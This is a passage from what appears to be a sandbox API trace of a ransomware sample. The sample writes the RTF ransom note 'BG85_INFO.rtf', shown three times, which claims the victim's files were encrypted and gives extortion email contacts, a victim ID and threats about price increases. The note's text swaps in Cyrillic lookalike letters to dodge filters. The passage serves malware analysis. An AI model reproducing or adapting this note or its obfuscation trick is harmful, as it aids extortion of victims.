pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0066.723] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2668a38, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\nÔ48Õ>*c\x98¿PËxf]ê\x8ac¤\x1eîJ\x09ÇY5ø}\"\x1f¯·èE\x1e\x1b\x9a®*À\x83èlÁÝ9\x99\x91i\x09\x9dÃø\x06Öå¥{\x9cÚ\x14\\\x7fÀï\x1b\x02\x03¬s\räç\x7f\x99õ c§¾\x9fÞ\x8bØfì¯ÜVËÞÏIîO¾@,nåèJê\x97\x03w\x07Ôr\x87\x13­4×¾\x80B=ÿƨ­DĨÊƶ\x19bonv|ßu5±\x12Qe\x7f\x9a\x8f\x02RùÿÙ¡ÃÀkI>o Ø\x95&Fk\x09²bß\x8a¨n*N\x0c-¶\x07º3_¨42>\x9b§g¶r ê\x91\x02Çy\x98\x1f\x99f±{\r9£", lpUsedDefaultChar=0x0) returned 7247 [0066.723] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.724] CloseHandle (hObject=0x1cc) returned 1 [0066.725] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\bg85_info.rtf")) returned 0xffffffff [0066.725] GetLastError () returned 0x2 [0066.725] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\VSTA\\ItemTemplates\\VisualBasic\\1033\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\vsta\\itemtemplates\\visualbasic\\1033\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 